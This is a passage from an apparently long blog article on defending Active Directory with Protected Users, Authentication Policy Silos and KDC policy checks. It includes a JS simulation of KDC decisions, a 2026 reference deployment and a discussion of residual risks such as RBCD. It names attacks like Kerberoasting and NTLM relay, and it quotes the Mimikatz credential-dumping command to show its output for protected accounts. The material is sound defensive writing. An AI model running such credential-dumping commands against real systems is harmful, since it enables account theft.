&lt;li&gt;&lt;strong&gt;No NTLM authentication.&lt;/strong&gt; The DC refuses any NTLM authentication attempt for a Protected Users member -- the NTLM SSP and NetLogon path on the DC enforce the rejection, and the Kerberos KDC enforces the corresponding refusal for AS-REQ flows that fall back to NTLM-style pre-authentication. NTLM relay against the account is structurally impossible because there is no NTLM session to relay.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No NTLM hash caching on the host.&lt;/strong&gt; Even if the user has logged on interactively, the LSA never holds the account&apos;s NT one-way function output. Mimikatz &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; prints &lt;code&gt;(null)&lt;/code&gt; for the NTLM tab.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No DES or RC4 in Kerberos pre-authentication.&lt;/strong&gt; AES-128 or AES-256 only. Kerberoasting against the account becomes inapplicable, because the public roasting tooling requires RC4-HMAC ticket material that the KDC refuses to issue.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No constrained or unconstrained delegation, in either direction.&lt;/strong&gt; The account cannot be the source of a constrained-delegation chain, and S4U2Self / S4U2Proxy against the account as a target is refused at TGS-REQ time.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No cached offline-sign-in verifier.&lt;/strong&gt; The Windows Hello for Business PIN-based offline-logon path is unavailable for Protected Users members; this is the operational price of removing the cached verifier from disk.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;TGT lifetime capped at 240 minutes, non-renewable.&lt;/strong&gt; Microsoft Learn states the figure verbatim: &quot;For Protected Users members, the group automatically sets these lifetime limits to 240 minutes&quot; [@ms-pu-current]. The cap overrides the domain&apos;s &quot;Maximum lifetime for user ticket&quot; and &quot;Maximum lifetime for user ticket renewal&quot; policies.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The built-in domain Administrator (RID 500) is always exempt from Authentication Policy enforcement even when assigned to a Silo, which makes it a candidate break-glass identity [@ms-pu-current]. That exemption does not extend to the Protected Users restriction set itself: adding RID 500 to Protected Users on a domain whose Administrator account lacks AES keys will lock the account out. Service accounts cannot be enrolled in Protected Users without breaking workflows -- see §6&apos;s canonical Microsoft Learn PullQuote on this point.&lt;/p&gt;
&lt;h3&gt;5.3 Authentication Policies and Silos: the KDC-side policy objects&lt;/h3&gt;
&lt;p&gt;Two AD object classes, layered. The containment direction is the most common practitioner confusion, so be precise about it: &lt;strong&gt;the Silo references the Policy, not the other way&lt;/strong&gt;.&lt;/p&gt;

The container object. A Silo enumerates the user, computer, and service accounts that share a set of restrictions and references one or more `msDS-AuthNPolicy` objects whose rules apply to its members. The Silo carries an `msDS-AuthNPolicySiloEnforced` Boolean that switches between audit-only and enforced modes. Accounts bind to it via `msDS-AssignedAuthNPolicySilo`, with `msDS-AuthNPolicySiloMembers` as the back-link [@ms-aps].

The rules object. A Policy carries the non-renewable TGT lifetime cap, the allowed-from SDDLs on source-machine identity (`UserAllowedToAuthenticateFrom`, `ServiceAllowedToAuthenticateFrom` -- computer accounts have no `-From` variant, only `-To`), the corresponding allowed-to SDDLs for delegation targets (`UserAllowedToAuthenticateTo`, `ServiceAllowedToAuthenticateTo`, `ComputerAllowedToAuthenticateTo`), claim-based authentication access-control conditions, and the option to require Kerberos armoring per RFC 6113 [@ms-aps][@rfc-6113].
&lt;p&gt;The same Policy can be referenced by multiple Silos. Accounts can be bound to a Policy directly via &lt;code&gt;msDS-AssignedAuthNPolicy&lt;/code&gt; without being placed in a Silo at all, though the more common pattern is Silo membership for the broader containment and Policy reuse for the rule definitions.&lt;/p&gt;
&lt;p&gt;The containment direction is the single most-common practitioner confusion. The Silo names the Policy that applies to its members. The same Policy can apply to several Silos. The directory links are role-specific: the Silo carries &lt;code&gt;msDS-UserAuthNPolicy&lt;/code&gt;, &lt;code&gt;msDS-ComputerAuthNPolicy&lt;/code&gt;, and &lt;code&gt;msDS-ServiceAuthNPolicy&lt;/code&gt;, each pointing outward to a Policy object [@ms-aps]. Older blog posts that describe &quot;the Policy attached to the Silo&quot; are using imprecise prose; the link in the schema is Silo to Policy, not the other way.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Policy and Silo objects replicate via standard AD multi-master directory replication -- the &lt;a href=&quot;https://paragmali.com/blog/two-checkmarks-and-the-keys-to-the-kingdom-how-active-direct/&quot; rel=&quot;noopener&quot;&gt;DRS Remote Protocol&lt;/a&gt;, MS-DRSR / &lt;code&gt;drsuapi&lt;/code&gt; [@ms-drsr]. They do NOT replicate via FRS or DFSR. FRS and DFSR replicate SYSVOL files (Group Policy content, scripts), not directory objects. Practitioners who chase &quot;my Policy assignment is not replicating&quot; through DFSR diagnostics are looking in the wrong primitive; the right one is &lt;code&gt;repadmin /showrepl&lt;/code&gt; against the DRS partition.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;5.4 The KDC&apos;s decision points&lt;/h3&gt;
&lt;p&gt;The KDC consults the directory at three precise moments, documented in [MS-KILE] §3.3.5 [@ms-kile]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AS-REQ.&lt;/strong&gt; The KDC reads the requester&apos;s &lt;code&gt;msDS-AssignedAuthNPolicySilo&lt;/code&gt; and any &lt;code&gt;msDS-AssignedAuthNPolicy&lt;/code&gt;. If the Policy specifies a &lt;code&gt;UserAllowedToAuthenticateFrom&lt;/code&gt; SDDL, the KDC evaluates the source-machine identity (as presented in the pre-authentication exchange) against the SDDL. On denial, the KDC returns &lt;code&gt;KDC_ERR_POLICY&lt;/code&gt; and no TGT is issued. The KDC also checks &lt;code&gt;PAC_LOGON_INFO.GroupIds&lt;/code&gt; for RID 525; if present, it applies the Protected Users restriction set to the TGT it is about to issue (AES-only, 240-minute cap, delegation forbidden).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;TGS-REQ for S4U2Self.&lt;/strong&gt; The KDC reads the target account&apos;s group memberships and Silo bindings. If the target is a Protected Users member, S4U2Self is refused. If the target&apos;s Silo Policy specifies an allowed-to SDDL, the requesting service identity is evaluated against it [@ms-sfu].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;TGS-REQ for S4U2Proxy.&lt;/strong&gt; The KDC evaluates the requesting service&apos;s &lt;code&gt;msDS-AllowedToDelegateTo&lt;/code&gt; and the target&apos;s &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt;, then layers the Silo Policy&apos;s claim requirements on top. Protected Users membership on either side terminates the request [@ms-sfu].&lt;/li&gt;
&lt;/ul&gt;

sequenceDiagram
    participant PAW as PAW (source machine)
    participant KDC as KDC on DC
    participant DS as Directory (LDAP DSA)
    PAW-&amp;gt;&amp;gt;KDC: AS-REQ for alice.da, pre-auth signed
    KDC-&amp;gt;&amp;gt;DS: Read alice.da object (PAC_LOGON_INFO, msDS-AssignedAuthNPolicySilo)
    DS--&amp;gt;&amp;gt;KDC: GroupIds includes RID 525, Silo = &quot;T0 Admins&quot;
    KDC-&amp;gt;&amp;gt;DS: Read referenced Policy (msDS-AuthNPolicy)
    DS--&amp;gt;&amp;gt;KDC: UserAllowedToAuthenticateFrom SDDL pinned to T0 PAWs
    KDC-&amp;gt;&amp;gt;KDC: Evaluate source machine identity against SDDL
    alt Source is in the allowed-from set
        KDC-&amp;gt;&amp;gt;KDC: Apply Protected Users restriction set (AES-only, no NTLM, no delegation)
        KDC-&amp;gt;&amp;gt;KDC: Cap TGT lifetime at 240 minutes non-renewable
        KDC--&amp;gt;&amp;gt;PAW: TGT issued with restriction PAC
    else Source not in the allowed-from set
        KDC--&amp;gt;&amp;gt;PAW: KDC_ERR_POLICY, no TGT issued
    end

flowchart LR
    A[&quot;User account alice.da (msDS-AssignedAuthNPolicySilo)&quot;] --&amp;gt; S[&quot;Silo: T0 Admins (msDS-AuthNPolicySilo)&quot;]
    C[&quot;Computer account paw01 (msDS-AssignedAuthNPolicySilo)&quot;] --&amp;gt; S
    SV[&quot;Service account svc-bkp (msDS-AssignedAuthNPolicySilo)&quot;] --&amp;gt; S
    S -- &quot;references&quot; --&amp;gt; P[&quot;Policy: T0 Source Restriction (msDS-AuthNPolicy)&quot;]
    P --&amp;gt; Rule1[&quot;UserAllowedToAuthenticateFrom SDDL&quot;]
    P --&amp;gt; Rule2[&quot;TGT lifetime cap&quot;]
    P --&amp;gt; Rule3[&quot;Claim transformations&quot;]
    P --&amp;gt; Rule4[&quot;FAST armoring requirement&quot;]
    S -. &quot;alt direct binding&quot; .-&amp;gt; A2[&quot;Account can also bind via msDS-AssignedAuthNPolicy&quot;]
&lt;p&gt;The RunnableCode block below simulates the decision tree as a small JS function. It is pedagogical, not a real KDC, but the logic mirrors what [MS-KILE] specifies. Change the inputs -- move the source machine outside the allowed-from set, flip the Protected Users flag -- and the decision changes.&lt;/p&gt;
&lt;p&gt;{`
function kdcDecideAsReq(account, sourceMachine) {
  // account: { name, inProtectedUsers, siloPolicy: { allowedFrom: [], tgtMinutes, requireFast } }
  // sourceMachine: { name }&lt;/p&gt;
&lt;p&gt;  if (account.siloPolicy &amp;amp;&amp;amp; account.siloPolicy.allowedFrom &amp;amp;&amp;amp;
      !account.siloPolicy.allowedFrom.includes(sourceMachine.name)) {
    return { issued: false, error: &quot;KDC_ERR_POLICY&quot;, reason: &quot;source not in allowed-from set&quot; };
  }&lt;/p&gt;
&lt;p&gt;  const restrictions = [];
  let tgtMinutes = account.siloPolicy ? account.siloPolicy.tgtMinutes : 600;
  let renewable = true;&lt;/p&gt;
&lt;p&gt;  if (account.inProtectedUsers) {
    restrictions.push(&quot;no-NTLM&quot;, &quot;AES-only&quot;, &quot;no-delegation&quot;, &quot;no-cached-verifier&quot;);
    tgtMinutes = Math.min(tgtMinutes, 240);
    renewable = false;
  }&lt;/p&gt;
&lt;p&gt;  return {
    issued: true,
    tgtMinutes,
    renewable,
    restrictions,
    sourceMachine: sourceMachine.name
  };
}&lt;/p&gt;
&lt;p&gt;const alice = {
  name: &quot;alice.da&quot;,
  inProtectedUsers: true,
  siloPolicy: { allowedFrom: [&quot;paw-t0-01&quot;, &quot;paw-t0-02&quot;], tgtMinutes: 480, requireFast: true }
};&lt;/p&gt;
&lt;p&gt;console.log(&quot;From PAW:&quot;, kdcDecideAsReq(alice, { name: &quot;paw-t0-01&quot; }));
console.log(&quot;From workstation:&quot;, kdcDecideAsReq(alice, { name: &quot;wks-finance-77&quot; }));
`}&lt;/p&gt;
&lt;p&gt;The KDC now has a vocabulary it did not have in 1997. Well-known group SID 525 as a credential-restriction switch. &lt;code&gt;msDS-AuthNPolicySilo&lt;/code&gt; and &lt;code&gt;msDS-AuthNPolicy&lt;/code&gt; as policy objects. &lt;code&gt;drsuapi&lt;/code&gt; as the replication primitive that carries policy changes to every DC. The decision is keyed on directory state, made at request time, before any TGT exists to be stolen. With the mechanism in hand, what does a current 2026 reference deployment look like?&lt;/p&gt;
&lt;h2&gt;6. The 2026 reference deployment&lt;/h2&gt;
&lt;p&gt;Microsoft has had thirteen years to settle the deployment shape. As of May 2026, a well-built environment looks like the layered stack below, in which Silos and Protected Users carry the on-prem enforcement and several complementary primitives close residuals the KDC plane cannot address by construction.&lt;/p&gt;

The control plane of an Active Directory environment. T0 contains the domain controllers and every system whose compromise grants forest-wide control: the AD CS certificate authorities, the Microsoft Entra Connect server, the privileged-access workstations used to manage them, and the backup systems that can restore any of those. The SpecterOps Tier Zero Table is the community-maintained canonical asset list and is the practical starting point for any T0 inventory [@tzt-pages][@tzt-github].
&lt;p&gt;The reference deployment composes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Tier model present as policy intent&lt;/strong&gt;, with Authentication Policy Silos as the enforcement primitive that makes the tier boundary KDC-visible.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;All human T0 administrators in Protected Users&lt;/strong&gt;, in a &quot;T0 Admins&quot; Silo whose Policy&apos;s &lt;code&gt;UserAllowedToAuthenticateFrom&lt;/code&gt; SDDL pins authentication to a defined set of T0 PAWs. The KDC will return &lt;code&gt;KDC_ERR_POLICY&lt;/code&gt; for any AS-REQ from outside that set [@ms-aps][@ms-kile].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;T0 service accounts in a &quot;T0 Services&quot; Silo&lt;/strong&gt; with a more permissive Policy that still pins source machines. Service accounts cannot be in Protected Users; the Silo plane is the only KDC-side enforcement available to them [@ms-pu-current].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domain-wide migration off RC4-HMAC&lt;/strong&gt; for AS-REP, with &lt;code&gt;msDS-SupportedEncryptionTypes&lt;/code&gt; audited per account. Protected Users enforces AES-only for free for human members; service accounts need explicit per-account configuration [@ms-config-pa].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; default-on&lt;/strong&gt; for non-DC Windows 11 22H2+ and Windows Server 2025+ devices that meet the hardware requirements [@ms-cred-guard]. &lt;strong&gt;Windows LAPS&lt;/strong&gt; managing local-administrator password uniqueness on every workstation [@ms-laps].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Entra PIM for Entra ID privileged roles&lt;/strong&gt; [@ms-pim], with &lt;strong&gt;Conditional Access&lt;/strong&gt; keyed on the synced T0 Admins group requiring phishing-resistant MFA and a compliant device. The CA does not see the Silo; it sees the synced group. The two planes are independent (see §8).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Defender for Identity&lt;/strong&gt; assessments running, including &quot;Identify privileged accounts that are not protected by Protected Users group&quot; and adjacent recommendations [@ms-mdi]. This is the detection plane that tells the operator the reference deployment is the deployed posture.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For the service accounts that cannot be enrolled in Protected Users, the explicit AES enforcement story is direct: set &lt;code&gt;msDS-SupportedEncryptionTypes&lt;/code&gt; to &lt;code&gt;0x18&lt;/code&gt; (AES128 &lt;code&gt;0x08&lt;/code&gt; + AES256 &lt;code&gt;0x10&lt;/code&gt;). To additionally signal Compound-Identity-Supported, use &lt;code&gt;0x20018&lt;/code&gt; (&lt;code&gt;0x18 | 0x20000&lt;/code&gt;) -- Compound-Identity-Supported is the &lt;code&gt;G&lt;/code&gt; bit at position 17 of the [MS-KILE] §2.2.7 &lt;em&gt;Supported Encryption Types Bit Flags&lt;/em&gt; diagram, value &lt;code&gt;0x20000&lt;/code&gt;, not &lt;code&gt;0x40&lt;/code&gt;. The full bit layout per [MS-KILE] §2.2.7 is: DES-CBC-CRC &lt;code&gt;0x01&lt;/code&gt;, DES-CBC-MD5 &lt;code&gt;0x02&lt;/code&gt;, RC4-HMAC &lt;code&gt;0x04&lt;/code&gt;, AES128-CTS-HMAC-SHA1-96 &lt;code&gt;0x08&lt;/code&gt;, AES256-CTS-HMAC-SHA1-96 &lt;code&gt;0x10&lt;/code&gt;, FAST-Supported &lt;code&gt;0x10000&lt;/code&gt;, Compound-Identity-Supported &lt;code&gt;0x20000&lt;/code&gt;, Claims-Supported &lt;code&gt;0x40000&lt;/code&gt;, Resource-SID-Compression-Disabled &lt;code&gt;0x80000&lt;/code&gt;; &lt;code&gt;0x40&lt;/code&gt; is bit 6 (AES128-CTS-HMAC-SHA256-128, an RFC 8009 enctype [@rfc-8009] older KDCs do not fully support and which is &lt;em&gt;not&lt;/em&gt; Compound-Identity-Supported). The value &lt;code&gt;0x18&lt;/code&gt; explicitly excludes RC4 (&lt;code&gt;0x04&lt;/code&gt;) and the two DES flavours (&lt;code&gt;0x01&lt;/code&gt;, &lt;code&gt;0x02&lt;/code&gt;). Note that &lt;code&gt;0x1C&lt;/code&gt; is &lt;em&gt;not&lt;/em&gt; AES-only -- it is &lt;code&gt;0x10 | 0x08 | 0x04&lt;/code&gt;, which re-introduces RC4 on the very account you are trying to harden. &lt;a href=&quot;https://paragmali.com/blog/dpapi-and-dpapi-ng-the-credential-vault-under-everything/&quot; rel=&quot;noopener&quot;&gt;Group Managed Service Accounts&lt;/a&gt; (gMSA) are the preferred new-service-account primitive: the Microsoft Key Distribution Service computes a long, automatically-rotated password keyed on a domain-wide root key, and the Microsoft Learn gMSA overview describes the mechanism in detail -- the resulting AES pre-auth tickets are not roastable in practical timeframes [@ms-gmsa-overview]. Microsoft&apos;s &lt;em&gt;How to Configure Protected Accounts&lt;/em&gt; page lays out the per-account migration steps for non-gMSA legacy services [@ms-config-pa].&lt;/p&gt;

Never add accounts for services and computers to the Protected Users group. For those accounts, membership doesn&apos;t provide local protections because the password and certificate is always available on the host. -- Microsoft Learn, *Protected Users Security Group* [@ms-pu-current]
&lt;p&gt;That quote is the operational reason the RBCD residual remains the punchline of §8. Before then, two further pieces of the reference deployment need to be named, because both have been mis-described in widely shared blog posts.&lt;/p&gt;
&lt;p&gt;The first is the &lt;strong&gt;November 2021 PAC hardening&lt;/strong&gt; in KB 5008380, which addressed CVE-2021-42287 and CVE-2021-42278 (&quot;noPAC&quot;). The fix added two new PAC buffer types to the Kerberos TGT: &lt;code&gt;PAC_REQUESTOR&lt;/code&gt; (buffer type 18), which encodes the SID of the principal that requested the ticket, and &lt;code&gt;PAC_ATTRIBUTES_INFO&lt;/code&gt; (buffer type 17), which carries PAC-generation attributes [@kb-5008380][@ms-pac]. The KDC at TGS-REQ time now verifies that the requestor SID in the PAC matches the principal currently presenting the TGT. Initial deployment was November 9, 2021; the Enforcement phase landed October 11, 2022 [@kb-5008380].&lt;/p&gt;
&lt;p&gt;The second is the &lt;strong&gt;May 2022 PKINIT certificate-to-account strong-mapping&lt;/strong&gt; fix in KB 5014754 [@kb-5014754]. Pre-fix, the KDC mapped a PKINIT certificate to an account by sAMAccountName or UPN -- the same comparison that Schroeder and Christensen&apos;s &lt;em&gt;Certified Pre-Owned&lt;/em&gt; whitepaper showed could be spoofed via UPN conflicts or via the trailing dollar-sign convention on machine accounts [@cert-preowned-blog][@cert-preowned-pdf]. The fix added the &lt;code&gt;SecurityIdentifier&lt;/code&gt; X.509 extension OID &lt;code&gt;1.3.6.1.4.1.311.25.2&lt;/code&gt; to certificates issued by AD CS and requires the KDC to match the SID in the certificate against the SID of the account being authenticated. The Full Enforcement default landed February 11, 2025; the Compatibility-mode revert option was removed on September 9, 2025 [@kb-5014754].&lt;/p&gt;

The November 2021 PAC hardening is not the encoding of Protected Users membership. The Protected Users marker is RID 525 in `PAC_LOGON_INFO.GroupIds`, present in the PAC since Windows Server 2012 R2 GA in October 2013. The November 2021 buffers (`PAC_REQUESTOR`, `PAC_ATTRIBUTES_INFO`) are a separate, later KDC anti-spoofing primitive that closes the sAMAccountName-spoofing chain in CVE-2021-42278 plus CVE-2021-42287 [@kb-5008380][@ms-pac]. Conflating them produces wrong threat-model claims: it treats a 2021 anti-spoofing fix as if it were the 2013 credential-restriction marker, and leaves the operator unable to reason about either correctly.
&lt;p&gt;&lt;strong&gt;Reference 2026 deployment: what runs where.&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Account class&lt;/th&gt;
&lt;th&gt;Protected Users?&lt;/th&gt;
&lt;th&gt;Silo membership&lt;/th&gt;
&lt;th&gt;Allowed-from SDDL anchor&lt;/th&gt;
&lt;th&gt;TGT cap&lt;/th&gt;
&lt;th&gt;Host-side&lt;/th&gt;
&lt;th&gt;Cloud-side&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Human T0 admin&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;T0 Admins&lt;/td&gt;
&lt;td&gt;T0 PAWs only&lt;/td&gt;
&lt;td&gt;240 min, non-renewable&lt;/td&gt;
&lt;td&gt;Credential Guard on the PAW; LAPS irrelevant (PAW is unique)&lt;/td&gt;
&lt;td&gt;Entra PIM + CA on synced group, phishing-resistant MFA, compliant device&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T0 service account (gMSA)&lt;/td&gt;
&lt;td&gt;No (breaks workflow)&lt;/td&gt;
&lt;td&gt;T0 Services&lt;/td&gt;
&lt;td&gt;T0 server set&lt;/td&gt;
&lt;td&gt;Default; per-Policy cap&lt;/td&gt;
&lt;td&gt;Credential Guard on every host the account runs on&lt;/td&gt;
&lt;td&gt;n/a (on-prem only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1 admin&lt;/td&gt;
&lt;td&gt;Optional&lt;/td&gt;
&lt;td&gt;T1 Admins&lt;/td&gt;
&lt;td&gt;T1 jump servers&lt;/td&gt;
&lt;td&gt;Default; per-Policy cap&lt;/td&gt;
&lt;td&gt;Credential Guard everywhere&lt;/td&gt;
&lt;td&gt;CA on synced T1 group&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T2 user&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Default&lt;/td&gt;
&lt;td&gt;Credential Guard default-on, LAPS for local admin&lt;/td&gt;
&lt;td&gt;CA general policy&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;If this is the reference deployment, what about the alternative architectures customers actually have in production -- ESAE forests, MIM PAM bastion forests, the Enterprise Access Model?&lt;/p&gt;
&lt;h2&gt;7. Tiered Administration vs. bastion forest vs. Enterprise Access Model&lt;/h2&gt;
&lt;p&gt;Three operational doctrines coexist in 2026 production environments, with a fourth meta-architecture sitting above them. None are interchangeable; choosing the wrong one means over-building, under-building, or building the right thing in the wrong place.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method A: Tier model + Authentication Policy Silos + Protected Users.&lt;/strong&gt; The current Microsoft recommendation for the on-prem enforcement layer in connected and hybrid environments. The whole of §5 and §6 is the description. Cited references: [@ms-pu-current][@ms-aps][@ms-eam].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method B: MIM Privileged Access Management with a bastion forest.&lt;/strong&gt; Microsoft Identity Manager PAM with the Server 2016 bastion-forest functional level gives just-in-time activation of privileged group membership in a separate, hardened &quot;bastion&quot; forest with a one-way trust &lt;em&gt;from&lt;/em&gt; production &lt;em&gt;to&lt;/em&gt; bastion. Microsoft Learn&apos;s &lt;em&gt;Raise the bastion forest functional level&lt;/em&gt; page is explicit on the feature pivot: &quot;With Windows Server 2016, PAM features of time-limited group memberships and shadow principal groups are built into Windows Server Active Directory&quot; [@ms-pam-bastion-ffl]. A user requests time-bound activation, MIM validates it, the user is briefly added to a bastion-forest privileged group (a shadow principal at WS 2016 FFL), and the resulting TGT carries the production SIDs via PAC SID History. When the activation expires, the SID History entry disappears from newly issued tickets. The Microsoft Learn page is explicit about scope:&lt;/p&gt;

The PAM approach provided by MIM PAM is not recommended for new deployments in Internet-connected environments. MIM PAM is intended to be used in a custom architecture for isolated AD environments where Internet access is not available, where this configuration is required by regulation, or in high impact isolated environments like offline research laboratories and disconnected operational technology or supervisory control and data acquisition environments. -- Microsoft Learn, *MIM PAM* [@ms-mim-pam]
&lt;p&gt;&lt;strong&gt;Method C: Enhanced Security Admin Environment (ESAE) / Red Forest.&lt;/strong&gt; A separate hardened forest used exclusively for administrative identities, with a one-way trust from production to the admin forest. Production-forest administration is performed by accounts that live exclusively in the admin forest. Microsoft retired ESAE as a mainstream recommendation on December 15, 2020 [@ms-esae-retire].&lt;/p&gt;

A dedicated Active Directory forest containing all administrative identities, with a one-way trust from the production forest to the admin forest. Retired as a mainstream Microsoft recommendation on December 15, 2020 [@ms-esae-retire]; preserved for air-gapped, OT, ICS, and SCADA scenarios where cloud-side privileged-access controls are unavailable. Microsoft&apos;s explicit guidance for existing ESAE deployments is &quot;no urgency to retire&quot; if the deployment is operating as designed.
&lt;p&gt;&lt;strong&gt;Method D: Enterprise Access Model (EAM) / Rapid Modernization Plan (RaMP).&lt;/strong&gt; Microsoft&apos;s current meta-architecture, announced concurrently with the ESAE retirement on December 15, 2020 [@ms-esae-retire][@ms-eam][@ms-ramp]. EAM widens the segmentation from forest boundaries to &lt;em&gt;access levels&lt;/em&gt;: a privileged-access plane (the equivalent of T0, now explicitly including Entra ID admin roles), a management plane (formerly T1), a data/workload plane (where applications run), and a user/app plane (T2). EAM does not deprecate the directory-level controls -- it encloses them inside a larger model that adds the cloud control plane as a first-class object.&lt;/p&gt;

Microsoft&apos;s December 15, 2020 meta-architecture for privileged-access. Replaces forest-level isolation with access-level segmentation across four planes: privileged-access, management, data/workload, and user/app. EAM is the framework; Method A (Tier model + Silos + Protected Users) is the on-prem enforcement layer inside the privileged-access plane; Entra PIM and Conditional Access are the cloud-side enforcement [@ms-eam][@ms-ramp].
&lt;p&gt;&lt;strong&gt;Four operational doctrines, side by side.&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;A: Tier + Silos + Protected Users&lt;/th&gt;
&lt;th&gt;B: MIM PAM bastion&lt;/th&gt;
&lt;th&gt;C: ESAE / Red Forest&lt;/th&gt;
&lt;th&gt;D: EAM + RaMP&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Enforcement plane&lt;/td&gt;
&lt;td&gt;KDC (AS-REQ, TGS-REQ, S4U)&lt;/td&gt;
&lt;td&gt;Bastion KDC + MIM workflow&lt;/td&gt;
&lt;td&gt;Admin-forest KDC + one-way trust&lt;/td&gt;
&lt;td&gt;Meta: composes A + cloud + host&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Primary restriction&lt;/td&gt;
&lt;td&gt;Where a TGT may be issued and to whom delegated&lt;/td&gt;
&lt;td&gt;Whether and for how long a privileged group is populated&lt;/td&gt;
&lt;td&gt;Which forest privileged identities live in&lt;/td&gt;
&lt;td&gt;Which planes are enforced and by what&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AD schema footprint&lt;/td&gt;
&lt;td&gt;4 attributes / 2 classes + RID 525&lt;/td&gt;
&lt;td&gt;Server 2016 PAM FFL + Shadow Principal extensions&lt;/td&gt;
&lt;td&gt;None new; uses standard trust + SID filtering&lt;/td&gt;
&lt;td&gt;n/a (model)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloud / hybrid coverage&lt;/td&gt;
&lt;td&gt;On-prem only&lt;/td&gt;
&lt;td&gt;On-prem only (explicitly NOT for connected)&lt;/td&gt;
&lt;td&gt;On-prem only&lt;/td&gt;
&lt;td&gt;First-class hybrid by design&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment complexity&lt;/td&gt;
&lt;td&gt;Moderate&lt;/td&gt;
&lt;td&gt;High (forest pair + SQL + MIM)&lt;/td&gt;
&lt;td&gt;Highest (forest pair + full DR)&lt;/td&gt;
&lt;td&gt;Variable (sum of constituents)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft current status (May 2026)&lt;/td&gt;
&lt;td&gt;Recommended for on-prem enforcement&lt;/td&gt;
&lt;td&gt;OT / ICS / regulated air-gapped only&lt;/td&gt;
&lt;td&gt;Legacy; supported for existing + OT only&lt;/td&gt;
&lt;td&gt;Recommended as top-level architecture&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Method D is the framework; Method A is the on-prem enforcement layer inside it; Methods B and C are the niche answers for environments Method A cannot reach. The four are not in competition for the same job. A connected hybrid enterprise in 2026 runs Method D + Method A on-prem, with B and C reserved for the air-gapped exception cases.&lt;/p&gt;
&lt;p&gt;EAM is the framework. Method A is its on-prem enforcement layer. What does Method A&apos;s enforcement layer NOT close, by construction?&lt;/p&gt;
&lt;h2&gt;8. What the KDC cannot enforce&lt;/h2&gt;
&lt;p&gt;A well-deployed Method A architecture eliminates the credential-theft attack chain at the KDC. It does not close every gap. The remaining gaps are not implementation bugs; they are structural properties of where the KDC sits in the stack. Naming them is not optional.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The RBCD residual.&lt;/strong&gt; &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Resource-based constrained delegation&lt;/a&gt; is configured by writing the &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; attribute on the target object [@ms-sfu]. The write is governed by the &lt;em&gt;target object&apos;s&lt;/em&gt; DACL, not by the Silo plane. The KDC never sees the write; it only sees the resulting TGS-REQ. If the target is a service account that is Silo&apos;d but not in Protected Users -- which, per Microsoft Learn&apos;s explicit guidance, is the case for most service accounts -- the RBCD chain remains exploitable. The defence is layered: pin the source machine via the Silo Policy, deny &lt;code&gt;WriteProperty&lt;/code&gt; on &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; for everyone but directory administrators, prefer Group Managed Service Accounts for new services, and put Defender for Identity detection on the attribute-write event [@ms-mdi].&lt;/p&gt;

A constrained-delegation primitive introduced in Windows Server 2012. Unlike classic constrained delegation (configured by the privileged administrator on the *delegating* service via `msDS-AllowedToDelegateTo`), RBCD is configured on the *target* by writing `msDS-AllowedToActOnBehalfOfOtherIdentity`. The target object&apos;s owner controls which services may impersonate users to it. Governance is at the ACL plane, not the KDC plane, which is why RBCD writes are invisible to Authentication Policy Silo enforcement [@ms-sfu].
&lt;blockquote&gt;
